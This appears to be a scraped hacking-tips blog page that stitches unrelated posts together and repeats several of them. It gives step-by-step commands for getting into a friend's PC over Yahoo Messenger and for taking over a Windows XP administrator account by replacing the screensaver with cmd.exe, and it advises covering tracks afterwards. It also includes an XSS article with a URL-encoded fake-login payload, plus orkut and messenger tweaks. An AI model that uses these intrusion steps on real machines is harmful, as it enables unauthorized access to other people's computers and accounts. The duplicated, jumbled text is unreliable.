how to hack my friend pc through yahoo messenger?
1) Open Command Prompt. Have some one on yahoo messenger send you a file; while the file is sending, in command prompt type -> netstat -an press enter2)it will show alll Active Connections on your computer, in there under foreign ip for a number thats ends in 5050. this is the persons ip adress who is sending you the file3)Now type : net use: h \\ (the person's ip adress)\shareddocs push enter wait for message to show up4)If it is successful you should get a message saying command prompt was successful. If you get a error message than your attempt has failed, probably because the person has security measures in place to prevent hacking.5)if you get the message that says command was successful, than go to my computer. There you will see a file named "shareddocs on (the name of your computer)" open this fileyou are now connected to that person's computer
Receive your orkut scraps on mobile
This article provides you with a very simple method to get orkut scraps delivered directly into your mobile phone as sms messages. The pages you may subscribe are scrapbook, community pages or even community messages. All the messages will be delivered free of cost. Following are the steps to get any orkut page as sms to mobile :
1. Register your mobile phone to MyToday. MyToday supports almost all networks in India.
2. Login to your orkut account and navigate to the page to which you wish to subscribe.
3. Copy the URL of the above page. It should be copied completely including http://. URL can be found in the address bar (where you enter www.orkut.com) of your browser.
4. In other window/ tab, open the orkutfeeds site and in the field provided, paste the above orkut URL and click on subscribe.
5. Now, copy the URL of subscription page as said above.
6. Open your MyToday account, and navigate to a page as seen in the snap in the following way: a. Under My tab, click on feeds.
b. Under My Folders, click on Manage feeds.
c. Under Folders tab, click on SMS.
d. You will now get into a page.
7. Enter the name as you wish. Say, “My scraps” and at the URL field, paste the URL which you have copied from orkutfeeds subscription page, check Send SMS, click Create.
8. You’re done! Now, you can expect your scraps delivered into your mobile phone as and when your scrapbook updates.
You may use following methods to get your scrap directed to your mobile phone.
1. Determine your cell phone’s email id and use RSSFWD to send scrapbook feed updates to your mobile phone. Easiest way to determine your mobile phone’s email id is to send an email from your cell phone to your mail id (it costs you ) and look for from address in mail. In RSSFWD, you need to enter your cell phone’s mail id instead of your email id.
2. Yahoo! Alerts:
This is quite simple, you need to register your mobile for Yahoo! Mobile or Yahoo! Messenger. Goto Yahoo! Alerts page for feeds. Enter the feed url for your orkut scrapbook and select your mobile device to receive alerts. This trick did not work for me when I used my messenger phone (Spice, Karnataka, India.) to receive alerts. My network is compatible with messenger but did not work for alerts. For detailed description of using Yahoo! Alerts, I recommend you reading this post.
3. We have few more sites like SendMeRss or MyToday(India) or any other applicable for your geographic location. Just use the same trick, use the feed generated by orkut feeds and subscribe to that using any services like the ones above mentioned. Or use your cell phone’s email address and signup for that mail notification.
1. Register your mobile phone to MyToday. MyToday supports almost all networks in India.
2. Login to your orkut account and navigate to the page to which you wish to subscribe.
3. Copy the URL of the above page. It should be copied completely including http://. URL can be found in the address bar (where you enter www.orkut.com) of your browser.
4. In other window/ tab, open the orkutfeeds site and in the field provided, paste the above orkut URL and click on subscribe.
5. Now, copy the URL of subscription page as said above.
6. Open your MyToday account, and navigate to a page as seen in the snap in the following way: a. Under My tab, click on feeds.
b. Under My Folders, click on Manage feeds.
c. Under Folders tab, click on SMS.
d. You will now get into a page.
7. Enter the name as you wish. Say, “My scraps” and at the URL field, paste the URL which you have copied from orkutfeeds subscription page, check Send SMS, click Create.
8. You’re done! Now, you can expect your scraps delivered into your mobile phone as and when your scrapbook updates.
You may use following methods to get your scrap directed to your mobile phone.
1. Determine your cell phone’s email id and use RSSFWD to send scrapbook feed updates to your mobile phone. Easiest way to determine your mobile phone’s email id is to send an email from your cell phone to your mail id (it costs you ) and look for from address in mail. In RSSFWD, you need to enter your cell phone’s mail id instead of your email id.
2. Yahoo! Alerts:
This is quite simple, you need to register your mobile for Yahoo! Mobile or Yahoo! Messenger. Goto Yahoo! Alerts page for feeds. Enter the feed url for your orkut scrapbook and select your mobile device to receive alerts. This trick did not work for me when I used my messenger phone (Spice, Karnataka, India.) to receive alerts. My network is compatible with messenger but did not work for alerts. For detailed description of using Yahoo! Alerts, I recommend you reading this post.
3. We have few more sites like SendMeRss or MyToday(India) or any other applicable for your geographic location. Just use the same trick, use the feed generated by orkut feeds and subscribe to that using any services like the ones above mentioned. Or use your cell phone’s email address and signup for that mail notification.
Cross Site Scripting (XSS) – The Underestimated Exploit
1. What is Cross Site Scripting?
Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. XSS in itself is a threat which is brought about by the internet security weaknesses of client-side scripting languages, with HTML and JavaScript (others being VBScript, ActiveX, HTML, or Flash) as the prime culprits for this exploit. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.
A basic example of XSS is when a malicious user injects a script in a legitimate shopping site URL which in turn redirects a user to a fake but identical page. The malicious page would run a script to capture the cookie of the user browsing the shopping site, and that cookie gets sent to the malicious user who can now hijack the legitimate user’s session. Although no real hack has been performed against the shopping site, XSS has still exploited a scripting weakness in the page to snare a user and take command of his session. A trick which often is used to make malicious URLs less obvious is to have the XSS part of the URL encoded in HEX (or other encoding methods). This will look harmless to the user who recognizes the URL he is familiar with, and simply disregards and following ‘tricked’ code which would be encoded and therefore inconspicuous.
2. Site owners are always confident, but so are hackers!
Without going into complicated technical details, one must be aware of the various cases which have shown that XSS can have serious consequences when exploited on a vulnerable web application. Many site owners dismiss XSS on the grounds that it cannot be used to steal sensitive data from a back-end database. This is a common mistake because the consequences of XSS against a web application and its customers have been proven to be very serious, both in terms of application functionality and business operation. An online business project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS exploits. Ironically, there are stories of site owners who have boldly claimed that XSS is not really a high-risk exploit. This has often resulted in a public challenge which hackers are always itching to accept, with the site owner having to later deal with a defaced application and public embarrassment.
3. The repercussions of XSS
Analysis of different cases which detail XSS exploits teaches us how the constantly changing web technology is nowhere close to making applications more secure. A thorough web search will reveal many stories of large-scale corporation web sites being hacked through XSS exploits, and the reports of such cases always show the same recurring consequences as being of the severe kind.
Exploited XSS is commonly used to achieve the following malicious results:
* Identity theft
* Accessing sensitive or restricted information
* Gaining free access to otherwise paid for content
* Spying on user’s web browsing habits
* Altering browser functionality
* Public defamation of an individual or corporation
* Web application defacement
* Denial of Service attacks
Any site owner with a healthy level of integrity would agree that none of the above can really be considered us frivolous or unimportant impacts on a vulnerable site. Security flaws in high-profile web sites have allowed hackers to obtain credit card details and user information which allowed them to perform transactions in their name. Legitimate users have been frequently tricked into clicking a link which redirects them to a malicious but legitimate-looking page which in turn captures all their details and sends them straight to the hacker. This example might not sound as bad as hacking into a corporate database; however it takes no effort to cause site visitors or customers to lose their trust in the application’s security which in turn can result in liability and loss of business.
4. A practical example of XSS on an Acunetix test site.
The following example is not a hacking tutorial. It is just a basic way to demonstrate how XSS can be used to control and modify the functionality of a web page and to re-design the way the page processes its output. The practical use of the example may be freely debated; however anyone may see the regular reports which describe how advanced XSS is used to achieve very complex results, most commonly without being noticed by the user. I encourage also those individuals with no hacking knowledge to try the following example, I am sure you will find it interesting.
1. Load the following link in your browser: http://testasp.acunetix.com/Search.asp, you will notice that the page is a simple page with an input field for running a search
2. Try to insert the following code into the search field, and notice how a login form will be displayed on the page:
Please login with the form below before proceeding:
Please login with the form below before proceeding:, then simply hit the search button after inserting the code.
Through the XSS flaw on the page, it has been possible to create a FAKE login form which can convince gather a user’s credentials. As seen in step 2, the code contains a section which mentions “destination.asp”. That is where a hacker can decide where the FAKE login form will send the user’s log-in details for them to be retrieved and used maliciously.
A hacker can also inject this code by passing it around via the browser’s address bar as follows:
http://testasp.acunetix.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+
the+form+below+before+proceeding%3A%3C form+action%3D%22test.asp%22%3E%3C
table%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D
text+ length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3C
td%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput +type%3Dtext+length%3D20
+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput
+type%3Dsubmit+value %3DLOGIN%3E%3C%2Fform%3E
This will create the same result on the page, showing how XSS can be used in several different ways to achieve the same result. After the hacker retrieves the user’s log-in credentials, he can easily cause the browser to display the search page as it was originally and the user would not even realize that he has just been fooled. This example may also be seen in use in all those spam emails we all receive. It is very common to find an email in your inbox saying how a certain auctioning site suspects that another individual is using your account maliciously, and it then asks you to click a link to validate your identity. This is a similar method which directs the unsuspecting user to a FAKE version of the auctioning site, and captures the user’s log-in credentials to then send them to the hacker.
5. Why wait to be hacked?
The observation which can be made when new stories of the latest hacks are published is that the sites which belong to the large brands and corporations are hacked in exactly the same way as those sites owned by businesses on a much smaller budget. This clearly shows how lack of security is not a matter of resources, but it is directly dependant on the lack of awareness among businesses of all size. Statistically, 42% of web applications which request security audits are vulnerable to XSS, which is clearly the most recurring high-risk exploit among all the applications tested. The effort to raise awareness about how easy it is for an expert hacker to exploit a vulnerable application does not seem to be going too far. It is still very common to see the “We’ll see when I get hacked” mentality still lingering among site owners who finally risk losing a lot of money and also the trust of their customers. Anybody with the interest to research this matter will see how even individuals claiming to be security experts feel comfortable to state that XSS is over-rated and cannot really be used to achieve serious results on a web application. However further research will also prove that statistical figures speak for themselves, and those same statistics keep growing at a rate which will eventually overcast the claims of those incredulous “experts”.
6. Scan your site for XSS with the Free Edition of Acunetix WVS.
Acunetix Web Vulnerability Scanner Free Edition offers the functionality for anyone who wants to test their own application for Cross Site Scripting. Acunetix encourages all site owners and developers to visit http://www.acunetix.com/cross-site-scripting/scanner.htm and to download the Free Edition of Acunetix WVS. This Free Edition will scan any web application for XSS and it will also reveal all the essential information related to it, such as the vulnerability location and remediation techniques. Scanning for XSS is normally a quick exercise (depending on the size of the application) and indeed can surprise all those who really wish to see where their web site stands from a security point of view.
DOWNLOAD YOUR FREE EDITION AND CHECK IF YOUR SITE IS VULNERABLE TO XSS TODAY!
Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. XSS in itself is a threat which is brought about by the internet security weaknesses of client-side scripting languages, with HTML and JavaScript (others being VBScript, ActiveX, HTML, or Flash) as the prime culprits for this exploit. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.
A basic example of XSS is when a malicious user injects a script in a legitimate shopping site URL which in turn redirects a user to a fake but identical page. The malicious page would run a script to capture the cookie of the user browsing the shopping site, and that cookie gets sent to the malicious user who can now hijack the legitimate user’s session. Although no real hack has been performed against the shopping site, XSS has still exploited a scripting weakness in the page to snare a user and take command of his session. A trick which often is used to make malicious URLs less obvious is to have the XSS part of the URL encoded in HEX (or other encoding methods). This will look harmless to the user who recognizes the URL he is familiar with, and simply disregards and following ‘tricked’ code which would be encoded and therefore inconspicuous.
2. Site owners are always confident, but so are hackers!
Without going into complicated technical details, one must be aware of the various cases which have shown that XSS can have serious consequences when exploited on a vulnerable web application. Many site owners dismiss XSS on the grounds that it cannot be used to steal sensitive data from a back-end database. This is a common mistake because the consequences of XSS against a web application and its customers have been proven to be very serious, both in terms of application functionality and business operation. An online business project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS exploits. Ironically, there are stories of site owners who have boldly claimed that XSS is not really a high-risk exploit. This has often resulted in a public challenge which hackers are always itching to accept, with the site owner having to later deal with a defaced application and public embarrassment.
3. The repercussions of XSS
Analysis of different cases which detail XSS exploits teaches us how the constantly changing web technology is nowhere close to making applications more secure. A thorough web search will reveal many stories of large-scale corporation web sites being hacked through XSS exploits, and the reports of such cases always show the same recurring consequences as being of the severe kind.
Exploited XSS is commonly used to achieve the following malicious results:
* Identity theft
* Accessing sensitive or restricted information
* Gaining free access to otherwise paid for content
* Spying on user’s web browsing habits
* Altering browser functionality
* Public defamation of an individual or corporation
* Web application defacement
* Denial of Service attacks
Any site owner with a healthy level of integrity would agree that none of the above can really be considered us frivolous or unimportant impacts on a vulnerable site. Security flaws in high-profile web sites have allowed hackers to obtain credit card details and user information which allowed them to perform transactions in their name. Legitimate users have been frequently tricked into clicking a link which redirects them to a malicious but legitimate-looking page which in turn captures all their details and sends them straight to the hacker. This example might not sound as bad as hacking into a corporate database; however it takes no effort to cause site visitors or customers to lose their trust in the application’s security which in turn can result in liability and loss of business.
4. A practical example of XSS on an Acunetix test site.
The following example is not a hacking tutorial. It is just a basic way to demonstrate how XSS can be used to control and modify the functionality of a web page and to re-design the way the page processes its output. The practical use of the example may be freely debated; however anyone may see the regular reports which describe how advanced XSS is used to achieve very complex results, most commonly without being noticed by the user. I encourage also those individuals with no hacking knowledge to try the following example, I am sure you will find it interesting.
1. Load the following link in your browser: http://testasp.acunetix.com/Search.asp, you will notice that the page is a simple page with an input field for running a search
2. Try to insert the following code into the search field, and notice how a login form will be displayed on the page:
Please login with the form below before proceeding:
Please login with the form below before proceeding:, then simply hit the search button after inserting the code.
Through the XSS flaw on the page, it has been possible to create a FAKE login form which can convince gather a user’s credentials. As seen in step 2, the code contains a section which mentions “destination.asp”. That is where a hacker can decide where the FAKE login form will send the user’s log-in details for them to be retrieved and used maliciously.
A hacker can also inject this code by passing it around via the browser’s address bar as follows:
http://testasp.acunetix.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+
the+form+below+before+proceeding%3A%3C form+action%3D%22test.asp%22%3E%3C
table%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D
text+ length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3C
td%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput +type%3Dtext+length%3D20
+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput
+type%3Dsubmit+value %3DLOGIN%3E%3C%2Fform%3E
This will create the same result on the page, showing how XSS can be used in several different ways to achieve the same result. After the hacker retrieves the user’s log-in credentials, he can easily cause the browser to display the search page as it was originally and the user would not even realize that he has just been fooled. This example may also be seen in use in all those spam emails we all receive. It is very common to find an email in your inbox saying how a certain auctioning site suspects that another individual is using your account maliciously, and it then asks you to click a link to validate your identity. This is a similar method which directs the unsuspecting user to a FAKE version of the auctioning site, and captures the user’s log-in credentials to then send them to the hacker.
5. Why wait to be hacked?
The observation which can be made when new stories of the latest hacks are published is that the sites which belong to the large brands and corporations are hacked in exactly the same way as those sites owned by businesses on a much smaller budget. This clearly shows how lack of security is not a matter of resources, but it is directly dependant on the lack of awareness among businesses of all size. Statistically, 42% of web applications which request security audits are vulnerable to XSS, which is clearly the most recurring high-risk exploit among all the applications tested. The effort to raise awareness about how easy it is for an expert hacker to exploit a vulnerable application does not seem to be going too far. It is still very common to see the “We’ll see when I get hacked” mentality still lingering among site owners who finally risk losing a lot of money and also the trust of their customers. Anybody with the interest to research this matter will see how even individuals claiming to be security experts feel comfortable to state that XSS is over-rated and cannot really be used to achieve serious results on a web application. However further research will also prove that statistical figures speak for themselves, and those same statistics keep growing at a rate which will eventually overcast the claims of those incredulous “experts”.
6. Scan your site for XSS with the Free Edition of Acunetix WVS.
Acunetix Web Vulnerability Scanner Free Edition offers the functionality for anyone who wants to test their own application for Cross Site Scripting. Acunetix encourages all site owners and developers to visit http://www.acunetix.com/cross-site-scripting/scanner.htm and to download the Free Edition of Acunetix WVS. This Free Edition will scan any web application for XSS and it will also reveal all the essential information related to it, such as the vulnerability location and remediation techniques. Scanning for XSS is normally a quick exercise (depending on the size of the application) and indeed can surprise all those who really wish to see where their web site stands from a security point of view.
DOWNLOAD YOUR FREE EDITION AND CHECK IF YOUR SITE IS VULNERABLE TO XSS TODAY!
Hack yahoo messenger and google talk to open multiple instances at a time
HERE’s a simple hack for yahoo messneger and google talk through which u can create multiple instances if in case u need to..
FOR YAHOO MESSENGER
Go to Start -> Run -> Type regedit -> hit enter
Go to HKEY_CURRENT_USER->> Software ->> Yahoo ->> pager ->>Test
Right click on test -> choose new Dword value .
Rename it as Plural.
Double click it -> assign a decimal value of 1.
Close registry -> Restart yahoo messenger.
NOW you can open yahoo messenger N number of times
FOR GOOGLE TALK
- Create a shortcut of Google Talk messenger on your desktop or any other location.
- Right click on the Google Talk messenger icon and select properties option
- Modify target location text by this
“c:\program files\google\google talk\googletalk.exe” /startmenu
to
“c:\program files\google\google talk\googletalk.exe” /nomutex
- Click OK
Now you can run multiple instances of google talk .
Access Stored User Names and Passwords with rundll32.exe
The Stored User Names and Passwords applet lets you assign user names and passwords to use when needing to authenticate yourself to services in domains other than the one you are currently logged into. The normal way of running this applet can be difficult to find quickly, so here is a way to launch it using a desktop shortcut using the rundll32.exe program:
Click on START - RUN and type the following (followed by ENTER):
rundll32.exe keymgr.dll,KRShowKeyMgr
How to hack windows XP admin password
How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos promptthen enter this set of commands Exactly:
cd\ {drops to root}
cd\windows\system32 {directs to the system32 dir}
mkdir temphack {creates the folder temphack}
copy logon.scr temphack\logon.scr {backsup logon.scr}
copy cmd.exe temphack\cmd.exe {backsup cmd.exe}
del logon.scr {deletes original logon.scr}
rename cmd.exe logon.scr {renames cmd.exe to logon.scr}
exit {quits dos}
Now what you have just done is told the computer to backup the command programand the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command
net user password
If the Administrator Account is called dinesh and you want the password blah enter this
net user dinesh blah
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
If you log into a limited account on your target machine and open up a dos promptthen enter this set of commands Exactly:
cd\ {drops to root}
cd\windows\system32 {directs to the system32 dir}
mkdir temphack {creates the folder temphack}
copy logon.scr temphack\logon.scr {backsup logon.scr}
copy cmd.exe temphack\cmd.exe {backsup cmd.exe}
del logon.scr {deletes original logon.scr}
rename cmd.exe logon.scr {renames cmd.exe to logon.scr}
exit {quits dos}
Now what you have just done is told the computer to backup the command programand the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command
net user
If the Administrator Account is called dinesh and you want the password blah enter this
net user dinesh blah
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Subscribe to:
Posts (Atom)
Posts
